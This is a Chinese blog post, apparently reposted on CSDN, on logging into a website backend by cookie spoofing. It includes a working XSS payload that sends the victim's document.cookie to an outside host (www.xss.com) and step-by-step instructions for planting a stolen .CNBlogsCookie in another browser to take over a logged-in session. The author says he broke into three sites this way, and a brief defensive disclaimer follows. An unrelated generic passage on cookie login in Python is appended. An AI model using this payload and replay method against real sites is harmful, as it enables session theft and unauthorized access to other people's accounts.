通过COOKIE欺骗登录网站后台

1.今天闲着没事看了看关于XSS(跨站脚本攻击)和CSRF(跨站请求伪造)的知识,xss表示Cross Site Scripting(跨站脚本攻击),它与SQL注入攻击类似,SQL注入攻击中以SQL语句作为用户输入,从而达到查询/修改/删除数据的目的,而在xss攻击中,通过插入恶意脚本,实现对用户游览器的控制,CSRF全名是Cross-site request forgery,是一种对网站的恶意利用,CSRF比XSS更具危险性。其实XSS攻击就是网站输入框没有限制非法字符,或者没有对脚本内容进行编码导致的!

 

var img = document.createElement('img');
img.src='http://www.xss.com?cookie='+document.cookie;
img.style.display='none';
document.getElementsByTagName('body')[0].appendChild(img);

 

比如这段代码,当我们没有对网站输入框进行非法字符的限制的话,用户输入了这段脚本,这样就会神不知鬼不觉的把当前用户的cookie发送给了我的恶意站点,我的恶意站点通过获取get参数就拿到了用户的cookie。当然我们可以通过这个方法拿到用户各种各样的数据。

 

 

2.当然我今天说的主要不是这些,而是通过你拿到的cookie,植入到你的浏览器中然后就可以访问网站后台了,下面我来为大家演示一遍,如何通过已存在的Cookie,进入博客园后台,我用IE浏览器和Chrome浏览器来测试!

首先我们通过IE浏览器拿到我们登入博客园后的Cookie,通过IECookiesview插件可以查看到IE浏览器下所有的Cookie信息,然后我们找到cnblogs.com站点下的Cookie,然后复制下.CNBlogsCookie和key和value值,如图所示! 

 

3.众所周知,cookies属于隐私数据,不同浏览器保存在不同地方。不可能共享的,此时我们再次打开Chorme浏览器,如图IE浏览器为登录状态,而chorme浏览器为未登录状态

 

 

4.那么此时我们就将刚拷贝的IE浏览器下博客园的cookie数据植入到chrome浏览器中,实现cookie欺骗登录到博客园后台,在chrome浏览器中添加cookies扩展程序,方便写入和删除cookie

 

 

5.然后打开cookies插件,我们就找到cnblogs.com下的cookie,默认没有登录的时候是没有.CNBlogsCookie这个cookie的, 然后我们点击添加一个cookie,将.CNBlogsCookie和key和value值写入进去,再刷新网站页面,成功进入博客园网站后台!  

 

 

6.如果将这个方法,再结合到开始讲的XSS攻击的话获取到别人网站的cookie信息,那么黑进别人网站的后台就很容易了,我自己也试了三个网站,都是可以成功进入的! 当然我说这些不是为了让大家黑别人的网站,只是只有弄懂了这些,才能更好的防范,保证自己开发的网站的安全! 

转载于:https://www.cnblogs.com/MR-YY/p/5259178.html

  • 0
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
通过cookie登录是一种常见的身份验证方式。当用户在网站上进行登录时,服务器会生成一个包含用户身份信息的cookie,并将其发送给用户的浏览器。浏览器会将这个cookie保存下来,并在后续的请求中自动发送给服务器,以便服务器能够识别用户的身份。 要通过cookie登录,首先需要获取到登录页面的cookie。可以使用编程语言中的HTTP库发送一个GET请求到登录页面,服务器会返回一个包含cookie的响应。然后,将这个cookie保存到本地文件或内存中。 接下来,在后续的请求中,需要将保存的cookie添加到请求的头部中。这样服务器就能够识别用户的身份,并返回相应的数据。 具体的实现方式会根据编程语言和框架的不同而有所差异。例如,在Python中可以使用urllib库和http.cookiejar模块来处理cookie。首先,需要创建一个cookiejar对象来保存cookie,然后使用HTTPCookieProcessor来处理cookie,最后使用build_opener方法创建一个带有cookie处理器的opener。通过这个opener发送请求,就可以自动处理cookie了。 以上是一个使用Python的示例代码,通过导入cookie文件进行登录。首先,创建一个cookiejar对象并加载cookie文件,然后使用HTTPCookieProcessor处理cookie,接着使用build_opener方法创建一个带有cookie处理器的opener。最后,使用opener发送请求并打印响应内容。 请注意,具体的实现方式可能会因为不同的编程语言和框架而有所不同,以上只是一个示例。在实际应用中,还需要根据具体情况进行适当的修改和调整。 #### 引用[.reference_title] - *1* *3* [使用cookie做用户登录的过程详解](https://blog.csdn.net/iteye_11790/article/details/82524313)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [python爬虫-使用cookie登录](https://blog.csdn.net/weixin_34138377/article/details/89663248)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值